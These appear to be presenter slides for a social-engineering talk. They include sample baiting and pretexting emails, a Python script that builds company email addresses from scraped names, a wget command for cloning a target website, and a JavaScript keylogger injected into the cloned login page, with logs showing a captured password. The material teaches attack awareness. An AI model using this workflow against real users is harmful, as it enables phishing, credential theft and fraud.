Social Engineering
Presenter Notes
Overview
What is social engineering? How can it be used?
Types of social engineering
- Phishing attacks - Baiting - Tailgating - Pretexting
Presenter Notes
Scraping emails
Scraping facebook
Presenter Notes
Scraping content
Snippet below
1 for line in rawNames:
2 if nameNext:
3 email = "{0}{1}{2}".format(line.split()[0][0], \
4 line.split()[1], "@company.com")
5 emails.append(email)
6 if len(line.split()) == 0:
7 nameNext = True
8 else:
9 nameNext = False
Presenter Notes
Snippet of scrapped emails
Presenter Notes
Baiting
from: Dylan Ayrey <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Would any other intern be interested in a Kayak trip? There's a place
downtown that'll take us for $50 a head if we can get 10 people
Presenter Notes
(Still the attacker)
from: David Someson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Yeah! That sounds like a lot of fun!
Presenter Notes
from: Dylan Ayrey <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Okay cool! I setup a paypal account at this email ([email protected]),
once we get 10 people we can go!
Presenter Notes
from: Chris Hanson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Nice! I just sent the money. Can't wait.
Presenter Notes
Tailgating
Presenter Notes
Pretexting
Complex back stories to trick people into performing actions
Scenario
from: Chris Hanson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
We are migrating databases from a non-relational database to a
relational database. Please try logging in and let me know if you
have any issues http://company.com
Hyperlink linkes to http://cmopany.com
Presenter Notes
Cloning the target
1 wget -r -l 2 -k -p -E -U "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36" www.company.com
- '-r': Recursive download. Grabs all references through the markup such as href and src. If the freshly downloaded file is also of type text/html, application/xhtml+xml, or text/css, it will be parsed and followed further.
- '-l': Sets the limit on -r to only traverse l levels (in this case 2)
- '-k': Converts absolute links to relative links to make them work locally
- '-p': Grabs static files and images (not html) one level deeper than the -l limit
- 'E': Appends extensions to the filenames such as '.html'
- 'U': User agnet string (to look like requests are from google chrome)
Presenter Notes
The keylogger
1 document.onkeypress = function(e) {
2 var get = window.event ? event : e;
3 var key = get.keyCode ? get.keyCode : get.charCode;
4 key = String.fromCharCode(key);
5 new Image().src = 'http://localhost:8000/keypress?key=' + key;
6 }
Presenter Notes
Where to place?
Anywhere? Everywhere? Let's try the login page
1 <script type='text/javascript' src='keylogger.js'></script>
Place that somewhere in the DOM of the login page, and make sure the keylogger.js file is in the accounts directory
Presenter Notes
Run the server
in the www.company.com directory run:
1 python -m SimpleHTTPServer
visit localhost:8000 and login
Presenter Notes
Results
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=h HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=e HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=w HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=r HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=d HTTP/1.1" 404 -